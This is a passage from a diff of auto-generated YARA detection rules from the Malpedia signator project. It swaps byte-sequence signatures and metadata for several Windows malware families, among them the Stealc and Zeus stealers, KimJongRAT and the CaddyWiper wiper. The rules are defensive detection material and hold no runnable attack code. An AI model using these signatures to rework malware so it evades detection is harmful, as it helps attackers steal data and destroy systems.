+		$sequence_6 = { 47 657449 7041 64647254 }
+		$sequence_7 = { 8bb6e4010000 85f6 7407 56 }
+		$sequence_8 = { 899e8c010000 66898e7c010000 89beac010000 899ea8010000 66898e98010000 b830750000 8d8e14020000 }
+		$sequence_9 = { 9c 9c 8f442420 9c }
+		$sequence_10 = { 7443 399df4fbffff 743b 7612 8b8df0fbffff 8b01 8d95f8fbffff }
+		$sequence_11 = { 6880000000 50 e8???????? 8b85a4fdffff }
+		$sequence_12 = { 85c0 7507 32c0 e9???????? 33c0 898598fdffff 399da0fdffff }
+		$sequence_13 = { 7443 8d85acfeffff 68???????? 50 }
+		$sequence_14 = { 50 53 53 c78580fdffff4a000000 }
+		$sequence_15 = { 6a0d 59 663bc8 0f84c6000000 }
+		$sequence_16 = { 54 9c 60 9c }
 
 	condition:
-		7 of them and filesize < 217088
+		7 of them and filesize < 1679360
 }
-rule MALPEDIA_Win_Dripion_Auto : FILE
+rule MALPEDIA_Win_Saint_Bot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6e941fbc-0092-5680-a9f8-3d85cce1c3ca"
+		id = "9b3de383-83bb-59eb-ab8e-cf55885e5316"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dripion_auto.yar#L1-L111"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.saint_bot_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "3337814c1f32071db01b4a02df38137e3cc930cfdb33776a0eb841a83537dbda"
+		logic_hash = "c120f50dc769e408884483c5952b8e78bb4b0a03aaa97a8ecb7b623ae2701d23"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113958,32 +113811,32 @@ rule MALPEDIA_Win_Dripion_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd6 0faff8 ffd6 0faff8 }
-		$sequence_1 = { ffd6 0faff8 8d3c7f ffd6 }
-		$sequence_2 = { 740f 3ccf 740b 34cf }
-		$sequence_3 = { ffd6 03f8 ffd6 8bd8 ffd6 0fafd8 }
-		$sequence_4 = { ffd6 03f8 8d3c7f ffd6 }
-		$sequence_5 = { 8bf8 ffd6 0faff8 8d3c7f ffd6 }
-		$sequence_6 = { 7513 6a64 ff15???????? 68???????? ff15???????? }
-		$sequence_7 = { 8bf8 ffd6 0faff8 8d3c7f }
-		$sequence_8 = { ffd6 8bf8 ffd6 0faff8 8d3c7f ffd6 }
-		$sequence_9 = { ffd6 8bf8 ffd6 0faff8 8d3c7f }
+		$sequence_0 = { 53 ff15???????? 6800018000 eb11 6a50 }
+		$sequence_1 = { 668975d4 8d4508 33f6 c745b418000000 683f000f00 50 }
+		$sequence_2 = { 3d2b040000 7415 3d3f040000 740e }
+		$sequence_3 = { 8945f8 e8???????? 68???????? 8945f0 }
+		$sequence_4 = { 56 ff15???????? ff15???????? 3db7000000 741c }
+		$sequence_5 = { 58 6a6e 668945f0 58 6a74 668945f2 }
+		$sequence_6 = { 6a00 56 68???????? 53 ff15???????? 8bf0 }
+		$sequence_7 = { 897dec 897df8 ffd6 6808020000 57 8bd8 ffd6 }
+		$sequence_8 = { ff75dc ffd6 ff75d4 ffd6 e8???????? }
+		$sequence_9 = { ffd6 ff75f0 ffd6 ff75f4 ffd6 ff75f8 ffd6 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 93184
 }
-rule MALPEDIA_Win_Predator_Auto : FILE
+rule MALPEDIA_Win_Roseam_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0d522826-628f-52a1-a5d4-de369cb17f76"
+		id = "d66e57df-f9e1-5b6e-89cb-6ce661f1848e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.predator_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.roseam_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "226e996f5790709cd601960ccd073047c3c37841c157b9e9145c03fdc70dc2d7"
+		logic_hash = "49c65990e1943387e5f2f0be33c8622a534714937967ee32ce82db7fba5361e7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113997,32 +113850,32 @@ rule MALPEDIA_Win_Predator_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8bf1 8d4dfd 57 6a0a }
-		$sequence_1 = { 395dec 7508 83c8ff e9???????? ff75ec e8???????? }
-		$sequence_2 = { 50 8bcf e8???????? e9???????? 0f2805???????? }
-		$sequence_3 = { 7316 8a440dc7 32c2 88440dc7 41 }
-		$sequence_4 = { 83c8ff e9???????? ff75ec e8???????? 59 8bf0 }
-		$sequence_5 = { 0fa2 8906 895e04 894e08 89560c 834dfcff 8b4df4 }
-		$sequence_6 = { 8b00 57 03c2 8bce 50 e8???????? 5f }
-		$sequence_7 = { 8906 895e04 894e08 89560c 834dfcff 8b4df4 }
-		$sequence_8 = { 395dec 7508 83c8ff e9???????? ff75ec e8???????? 59 }
-		$sequence_9 = { ff750c 8bf1 8d4dfd ff7508 }
+		$sequence_0 = { 5d c3 8d4db8 c60200 51 }
+		$sequence_1 = { 33c9 66894304 66894b06 50 68???????? }
+		$sequence_2 = { 0f8682000000 66833b20 747c 56 }
+		$sequence_3 = { 9d 5d 8b45f8 85c0 0f84db000000 }
+		$sequence_4 = { 41 40 894dfc 8945f8 68???????? 50 9c }
+		$sequence_5 = { 58 58 8b45bc 48 7409 83e803 0f854c010000 }
+		$sequence_6 = { 8d85f4fcffff 8a10 8a1e 8aca 3ad3 751e 84c9 }
+		$sequence_7 = { 803a2e 740c 8a4201 42 }
+		$sequence_8 = { c7451800000000 84c0 7478 68???????? 50 }
+		$sequence_9 = { b9ff000000 33c0 8dbdf1f7ffff 8895f0f7ffff 8b1e f3ab }
 
 	condition:
-		7 of them and filesize < 2211840
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Expiro_Auto : FILE
+rule MALPEDIA_Win_Miniblindingcan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6fa4b0d5-e65d-5709-9429-c535e22a563a"
+		id = "2e31c245-b31c-5b1f-badb-b374294b1a0c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.expiro"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.expiro_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniblindingcan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.miniblindingcan_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "e9646f75b21b41c42f31fadf4efd1887628909c4616d1866a9062fcf7c528d57"
+		logic_hash = "f1bc6c8d1c138b9d3da736626c3c3e7c154dc57584230d14e9675b4385ae575b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114036,34 +113889,34 @@ rule MALPEDIA_Win_Expiro_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 e8???????? 83c404 385c2413 0f85ddfdffff b8???????? 8d4c2414 }
-		$sequence_1 = { 02abd9737373 739b 057d737313 7173 7373 7373 }
-		$sequence_2 = { 8d7558 c684244802000002 33c0 c7461407000000 895e10 668906 }
-		$sequence_3 = { 367bf8 337ffa 36871b 49 16 62639b }
-		$sequence_4 = { 56 6a00 6a00 ff15???????? b932000000 8bc3 33ed }
-		$sequence_5 = { 8b06 33d2 5f 668910 8bc6 5b c20800 }
-		$sequence_6 = { 668906 57 83c8ff 8bd6 e8???????? 897c2420 }
-		$sequence_7 = { 8b4c241c 33cc b001 e8???????? 83c420 c3 6aff }
-		$sequence_8 = { 50 8d7c247c c68424f802000003 e8???????? 83c404 c68424f402000002 837c243808 }
-		$sequence_9 = { 83c8ff b9???????? 8d542450 89742464 897c2460 e8???????? }
+		$sequence_0 = { e9???????? 81fbba470000 7513 488d0511350000 488905???????? e9???????? 81fb63450000 }
+		$sequence_1 = { 488bc6 488d1523dd0100 83e11f 48c1f805 486bc958 48030cc2 eb07 }
+		$sequence_2 = { 48893d???????? eb1b 488b0d???????? 488d15bf980100 ff15???????? 488905???????? 4183fc0a }
+		$sequence_3 = { 7478 488b03 83e20f 488907 488b4308 4803de 48894708 }
+		$sequence_4 = { 8bc0 41890c86 498b0c24 490fafc8 48c1e934 8bc9 418b048e }
+		$sequence_5 = { 8d4af3 ff15???????? 41be4c000000 498bcf 488bd0 458bc6 488be8 }
+		$sequence_6 = { 488b8a50000000 e9???????? 4055 4883ec40 488bea 488d4540 4889442430 }
+		$sequence_7 = { b835000000 0f05 c3 4c8bd1 b836000000 0f05 }
+		$sequence_8 = { 448bc7 488bce 488bd0 4c8be0 e8???????? 3bc5 7412 }
+		$sequence_9 = { 488b4c2458 c744244802000000 488d442454 4889442440 }
 
 	condition:
-		7 of them and filesize < 3776512
+		7 of them and filesize < 453632
 }
-rule MALPEDIA_Win_Xpan_Auto : FILE
+rule MALPEDIA_Win_Zeus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9c9e2899-7c42-5d4a-8e72-8695f33e2151"
+		id = "a7137ca7-f65f-570e-b179-06b94ad7a971"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xpan_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeus_auto.yar#L1-L225"
 		license_url = "N/A"
-		logic_hash = "02ec4378c7469aa379433aa31077402814d90eca993bb596a3f9dbc0c47c27e0"
+		logic_hash = "3d703221ad7e27ff4fc081759a0590d4715ffa458d7987388aee7eef0fc141ff"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -114075,32 +113928,45 @@ rule MALPEDIA_Win_Xpan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b16 899310010000 8b542414 e8???????? 89b310010000 e9???????? 8b6904 }
-		$sequence_1 = { 8b4d10 85c9 0f84cdfdffff 66837d14ff bb01000000 0f84d7000000 8b4d08 }
-		$sequence_2 = { 0fb64c2454 8b442440 896c2408 88542418 890424 894c2404 }
-		$sequence_3 = { 8b4508 c685f0feffff00 890424 e8???????? 8d8d60ffffff 8985d4feffff e8???????? }
-		$sequence_4 = { b904000000 89f5 e9???????? 8b8c24b0000000 8b5004 8b00 }
-		$sequence_5 = { 89eb 0f841dffffff f744245400040000 7483 0fb6442454 89742408 892c24 }
-		$sequence_6 = { 8b4bf4 85c9 7438 807dc600 8d45e4 8945c8 }
-		$sequence_7 = { 89d3 75ed 8b4728 83f8ff 7475 39f0 0f4df0 }
-		$sequence_8 = { 7412 85ff 0f846e010000 85c0 ba???????? 0f44c2 85f6 }
-		$sequence_9 = { 85d2 89742418 8b6c2444 8b74241c 0f8571feffff c647ff00 b801000000 }
+		$sequence_0 = { eb58 833f00 7651 8b5f08 }
+		$sequence_1 = { 8d461c 50 8d45f0 50 e8???????? 6a10 8d460c }
+		$sequence_2 = { 8d461c 50 8d460c 50 e8???????? }
+		$sequence_3 = { 8d440810 8bc8 2bca 8b12 }
+		$sequence_4 = { 8d460c 8d4df0 e8???????? f7d8 1ac0 fec0 c9 }
+		$sequence_5 = { 85c0 7438 83600400 8918 8b4e08 }
+		$sequence_6 = { 8906 85ff 760c 8b550c }
+		$sequence_7 = { 83f801 7516 51 e8???????? }
+		$sequence_8 = { 8bf3 6810270000 ff35???????? ff15???????? }
+		$sequence_9 = { 891d???????? 891d???????? ffd6 68???????? }
+		$sequence_10 = { e8???????? 84c0 7442 6a10 }
+		$sequence_11 = { 8d8db0fdffff e8???????? 8ad8 84db }
+		$sequence_12 = { c20400 55 8bec f6451802 }
+		$sequence_13 = { ff15???????? 5e 8ac3 5b c20800 55 }
+		$sequence_14 = { b364 6a14 eb18 81fb5a5c4156 }
+		$sequence_15 = { 8d470c 50 c707000e0000 c7470809080002 e8???????? 83674200 6a78 }
+		$sequence_16 = { 3509080002 3d5c5b4550 740b 3d59495351 0f85ca000000 807b0420 0f85c0000000 }
+		$sequence_17 = { 0f873d020000 83fe06 0f86e3000000 8b03 3509080002 3d5c5b4550 740b }
+		$sequence_18 = { 68???????? 6809080002 8bc6 50 8d45fc }
+		$sequence_19 = { 56 68???????? ff750c 51 ff7508 ff15???????? 8bf8 }
+		$sequence_20 = { 8d75a8 b8d5000000 e8???????? 68e6010000 68???????? 6809080002 }
+		$sequence_21 = { 6813270000 6a04 5b 8bc6 c745f809080002 e8???????? 8ad8 }
+		$sequence_22 = { 807b0244 7429 83fe04 0f82ec000000 8b1b 81f309080002 }
 
 	condition:
-		7 of them and filesize < 3235840
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Manitsme_Auto : FILE
+rule MALPEDIA_Win_Tempedreve_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "71cb4532-c54e-57eb-a20c-2765fcfa6978"
+		id = "2db2cfb5-7120-5d3b-b0b8-3bdd15ee2814"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.manitsme_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tempedreve_auto.yar#L1-L163"
 		license_url = "N/A"
-		logic_hash = "f54a2de03d86d0088dd4a7debb0ef3d048ee2324f936fed5683caed7b0cf71b4"
+		logic_hash = "81da1ba35c5682d2618815158fab067de40d7a4b67ee1d7e4df00dcd82c55387"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114114,32 +113980,38 @@ rule MALPEDIA_Win_Manitsme_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895c2450 ffd6 8b35???????? 8d542410 52 }
-		$sequence_1 = { 85c0 0f84a2000000 837c241000 766e 6a00 8d442414 50 }
-		$sequence_2 = { 8bc8 c1f905 8d1c8d40580110 8bf0 83e61f 6bf628 8b0b }
-		$sequence_3 = { d96c2416 e8???????? 83c404 85c0 7505 b8100e0000 }
-		$sequence_4 = { 6a02 68???????? be07000000 e8???????? }
-		$sequence_5 = { 68???????? 32db e8???????? dc0d???????? }
-		$sequence_6 = { 52 be04010000 8bfb e8???????? }
-		$sequence_7 = { ff15???????? 6a00 b801000000 e8???????? 83c404 b801000000 c20c00 }
-		$sequence_8 = { ffd3 85c0 7586 50 ff15???????? }
-		$sequence_9 = { 7416 8bc1 83e01f 6bc028 8bd1 c1fa05 03049540580110 }
+		$sequence_0 = { 663bfb 7407 663b7c2448 7520 0fb77804 }
+		$sequence_1 = { 8d5602 03d1 e9???????? 807dfe80 751e 8a4101 24f8 }
+		$sequence_2 = { 83c40c ab 55 8d84247c0e0000 50 }
+		$sequence_3 = { 0f85c8020000 0fb74314 55 56 0fb77306 }
+		$sequence_4 = { 740e 80fb12 7511 8a4101 24c0 }
+		$sequence_5 = { 8a1c1e 8d42d0 46 32c9 3c09 }
+		$sequence_6 = { 015308 f7d0 0bc2 33c6 }
+		$sequence_7 = { ff743bfc 8bcb ff743bf8 e8???????? }
+		$sequence_8 = { 0f85c9000000 8b542430 3bda 7320 8d4d02 }
+		$sequence_9 = { c0e801 7434 83d102 89c5 }
+		$sequence_10 = { 2bc8 894c2414 3b4c242c 0f8738010000 8b4c2410 }
+		$sequence_11 = { c1e903 8d440140 c20400 8b44240c }
+		$sequence_12 = { d1c0 33c7 0fb6b90130cb00 d1c0 }
+		$sequence_13 = { 3a1429 8b4c2414 bb02000000 740c 3b8e24040000 0f85c9000000 }
+		$sequence_14 = { 0f846b010000 83ff01 0f8650010000 8b542454 8bcf 2bcb 8d0411 }
+		$sequence_15 = { f7d0 8944241c 61 c20800 60 8b742424 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Stealc_Auto : FILE
+rule MALPEDIA_Win_Kimjongrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff6aaa00-958c-53cc-ab33-0d5cc117632f"
+		id = "4b926698-de48-5e8a-8566-c17b49269158"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stealc_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimjongrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kimjongrat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "0abba8b26d40125f184d3d439be2ae9ffb7dbc4aae103ea542b0165f4c38fedb"
+		logic_hash = "da574ab8eb91cef15d29c514535c9dc879faba86aa4b2abebc3c50264b62c499"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114153,40 +114025,32 @@ rule MALPEDIA_Win_Stealc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? e8???????? 81c480000000 e9???????? }
-		$sequence_1 = { e8???????? e8???????? 83c418 6a3c }
-		$sequence_2 = { e8???????? 83c460 e8???????? 83c40c }
-		$sequence_3 = { ff15???????? 85c0 7507 c685e0feffff43 }
-		$sequence_4 = { 68???????? e8???????? e8???????? 83c474 }
-		$sequence_5 = { 50 e8???????? e8???????? 81c484000000 }
-		$sequence_6 = { 8d85dcf7ffff 50 8b450c 53 ff30 895df0 }
-		$sequence_7 = { 8d85dcf7ffff 50 ff15???????? 85c0 0f84a1000000 }
-		$sequence_8 = { e8???????? e8???????? 83c47c e9???????? }
-		$sequence_9 = { 69c10ba31400 894d80 2bc2 66894584 }
-		$sequence_10 = { e9???????? 694d940ba31400 ba51754269 2bca }
-		$sequence_11 = { 2bca 884c0588 48ffc0 4883f808 }
-		$sequence_12 = { 2bc2 66894584 69c187fd701e b934eddb95 }
-		$sequence_13 = { 85c0 750a b043 66c745a04300 eb03 8a45a0 }
-		$sequence_14 = { 8bcc 8d85e8fcffff 50 e8???????? }
-		$sequence_15 = { 894d94 b925000000 e8???????? 0fb64d8f }
-		$sequence_16 = { ba51754269 2bca 69c10ba31400 894d80 }
-		$sequence_17 = { e8???????? 0fb64d8f 4c8be0 440fb6458e }
+		$sequence_0 = { eb13 ff37 6a00 ff771c 52 ff7508 e8???????? }
+		$sequence_1 = { 85c9 740e 51 50 e8???????? 83c408 0bf8 }
+		$sequence_2 = { e9???????? c6840decfbffff64 e9???????? c6840decfbffff70 e9???????? c6840decfbffff73 e9???????? }
+		$sequence_3 = { c6840db0abffff29 e9???????? c6840db0abffff3b e9???????? c6840db0abffff2b e9???????? c6840db0abffff3e }
+		$sequence_4 = { 8b43e8 0343e4 8943cc e9???????? 8d4304 50 8d73d4 }
+		$sequence_5 = { 8bd7 85d2 7464 8b4d08 8b4908 8b491c 8b4910 }
+		$sequence_6 = { beff1f0000 6685700c 8b75c8 741c 6a00 52 57 }
+		$sequence_7 = { 8b5d08 807b4201 0f859d000000 8a5340 f6c202 0f8491000000 8b4b10 }
+		$sequence_8 = { e9???????? 6a01 ff73b4 57 e8???????? ff73c4 ff73f4 }
+		$sequence_9 = { e8???????? 8b5d10 53 6a00 6a4f ff75f8 8bf8 }
 
 	condition:
-		7 of them and filesize < 4891648
+		7 of them and filesize < 1572864
 }
-rule MALPEDIA_Win_Whitebird_Auto : FILE
+rule MALPEDIA_Win_Slip_Screen_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1f55b3f7-b049-5ddb-a603-f3dac3229eba"
+		id = "ad9c8d39-15d3-5df8-9251-a49652741d85"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.whitebird_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slip_screen"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slip_screen_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "084753ca04c12bd29943e734768bdc4d7b6a6a5445a6b9fa8738444da44f9e8b"
+		logic_hash = "dad34e4a0f7996ab63085bce3884e3e4048e2436bb6df0518e66ce50f19fbbe3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114200,37 +114064,32 @@ rule MALPEDIA_Win_Whitebird_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb09 80f92f 0f95c1 80c13f }
-		$sequence_1 = { 488b83e8140000 488d15a7f2ffff 41b82f000000 488901 488b83f0140000 }
-		$sequence_2 = { 56 e8???????? 59 8945d4 85c0 0f84f5000000 6a00 }
-		$sequence_3 = { 66898d56ffffff 59 6689855cffffff 66898d58ffffff 8bc8 33c0 }
-		$sequence_4 = { 74ea 3918 7467 8b85f4feffff }
-		$sequence_5 = { 7cd5 41c60300 4863c2 4c2bd8 4c891e }
-		$sequence_6 = { 4c8d4c2440 458bc4 488bd0 488bcd }
-		$sequence_7 = { 66898572ffffff 66898d68ffffff 59 6a73 66898d6affffff 8bc8 58 }
-		$sequence_8 = { 488d0dacc9ffff 41b808020000 ff15???????? 4c8d5c2478 488d8424b0000000 }
-		$sequence_9 = { 8d43f5 66898c2400010000 66898424fe000000 8d43f6 6689942408010000 }
-		$sequence_10 = { ffd0 8d4584 50 6802000080 }
-		$sequence_11 = { 41bc00200000 498bd4 488d8c2450050000 e8???????? 33c0 488bcb }
-		$sequence_12 = { 8985b8fcffff 8b859cfcffff 0fb74002 83c40c 50 c785b4fcffff06000000 ff15???????? }
-		$sequence_13 = { 83fe1a 0f8c77ffffff 488d4c2450 ff15???????? 8b542460 8b442458 }
-		$sequence_14 = { 6806020000 50 668985f4fdffff 8d85f6fdffff 50 e8???????? 8bc7 }
+		$sequence_0 = { eb0c 4881c7e8000000 4885f6 7405 488bce ff17 4d85f6 }
+		$sequence_1 = { 4885c9 0f8498000000 4863413c 4533db 448b8c0888000000 }
+		$sequence_2 = { 48898798000000 4885c0 0f8462020000 41b8ce48ccfd 8bd6 488bcb }
+		$sequence_3 = { 7447 410fb702 6685c0 7438 8d4abf 6683f919 448d4220 }
+		$sequence_4 = { eb02 33c0 4c8d9c2490040000 498b5b28 498b6b30 }
+		$sequence_5 = { 4903c1 4d8bc8 488bc8 48c1e020 48c1e920 480bc8 0fb7c1 }
+		$sequence_6 = { 0f1000 0f1145c4 f20f104810 f20f114dd4 8b4018 8945dc }
+		$sequence_7 = { 488b8100010000 4885c0 7403 f0ff00 488d4138 41b806000000 488d1547960000 }
+		$sequence_8 = { 488bd0 48c1e020 48c1ea20 480bd0 0fb7c2 6633443bfa }
+		$sequence_9 = { 0fafca 4403c9 440fafc8 458bc1 440fafc0 428d0c0a }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 282624
 }
-rule MALPEDIA_Win_Open_Carrot_Auto : FILE
+rule MALPEDIA_Win_Caddywiper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "83f461b8-8266-54de-aecf-ccf2d96f380a"
+		id = "3bfe4656-7095-5bf1-a220-b7990a8e8540"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.open_carrot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.open_carrot_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.caddywiper_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "e66ea48fe876b6e65527515af0e78a716fad581d1208dc43cfdbcb201ec0f71a"
+		logic_hash = "1d17e07981d8c6c1b9158309889ffc1ea6f49825b4f9491b9319c2fdd5793cb7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114244,34 +114103,34 @@ rule MALPEDIA_Win_Open_Carrot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 66894110 837de801 0f8588000000 488bc7 80bdfa00000001 7545 0f1f440000 }
-		$sequence_1 = { e8???????? 4863d7 4c8d05dbdc0f00 41b9e3010000 498bce e8???????? 418bc7 }
-		$sequence_2 = { 80fb00 0f846c000000 4d31e5 4881e700080000 49c7c501000000 4989eb 4881e190000000 }
-		$sequence_3 = { 55 48bd612fef7700000000 48016c2408 5d 8f042b 48812c2b612fef77 50 }
-		$sequence_4 = { 4d29c9 0137 4981e13f000000 4889eb 4881c306010000 4d09c1 2933 }
-		$sequence_5 = { 8bd6 488d8d10070000 e8???????? 85c0 400f94c7 eb03 4032ff }
-		$sequence_6 = { e8???????? 498bcd e8???????? 448b442434 4c8d0dc8cb0d00 ba72000000 c744242082020000 }
-		$sequence_7 = { 4c8d8594080000 4489b520030000 bacc010000 488d8d24030000 e8???????? 448bad20030000 448b4c2438 }
-		$sequence_8 = { 68bc5c574f 4150 4d89f0 4150 8f442408 4158 8f0424 }
-		$sequence_9 = { 488d1575381000 41b872010000 e8???????? 48638300020000 4c89bcc380000000 48638300020000 488b6c2448 }
+		$sequence_0 = { c645af55 c645b073 c645b165 c645b272 c645b373 c645b400 }
+		$sequence_1 = { 33c0 eb69 c78564ffffff01000000 8b55a8 899568ffffff }
+		$sequence_2 = { c685b6fbffff65 c685b7fbffff00 c685b8fbffff72 c685b9fbffff00 c685bafbffff6e c685bbfbffff00 }
+		$sequence_3 = { 33c0 eb13 ff55b4 3d14050000 7504 }
+		$sequence_4 = { c68597feffff00 c68598feffff70 c68599feffff00 c6859afeffff69 c6859bfeffff00 c6859cfeffff33 }
+		$sequence_5 = { 0f85fe000000 8b55f4 8b4210 8945f0 }
+		$sequence_6 = { c685b8feffff72 c685b9feffff69 c685bafeffff74 c685bbfeffff79 c685bcfeffff49 }
+		$sequence_7 = { 85d2 7421 8b4508 0345f4 8a4dfb }
+		$sequence_8 = { c745fc00000000 c68538ffffff43 c68539ffffff6c c6853affffff6f c6853bffffff73 }
+		$sequence_9 = { 83ec70 c745f800000000 c745ec00000000 64a130000000 }
 
 	condition:
-		7 of them and filesize < 8377344
+		7 of them and filesize < 33792
 }
-rule MALPEDIA_Win_Bankshot_Auto : FILE
+rule MALPEDIA_Win_Longwatch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c44209fc-b1c7-5402-9078-b4bcc5bc536b"
+		id = "ce0e9c11-46ca-5532-8823-1deb885f5c74"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bankshot_auto.yar#L1-L435"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.longwatch_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "63bc5c29766faa4a92cc1d97b03d2ca49fa1b92e737ecc0b56db090eb70af715"
+		logic_hash = "9dae6296ff953841361d58c7b1fa7eff6214a00cb7112d7c5966dd21deae5ffb"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
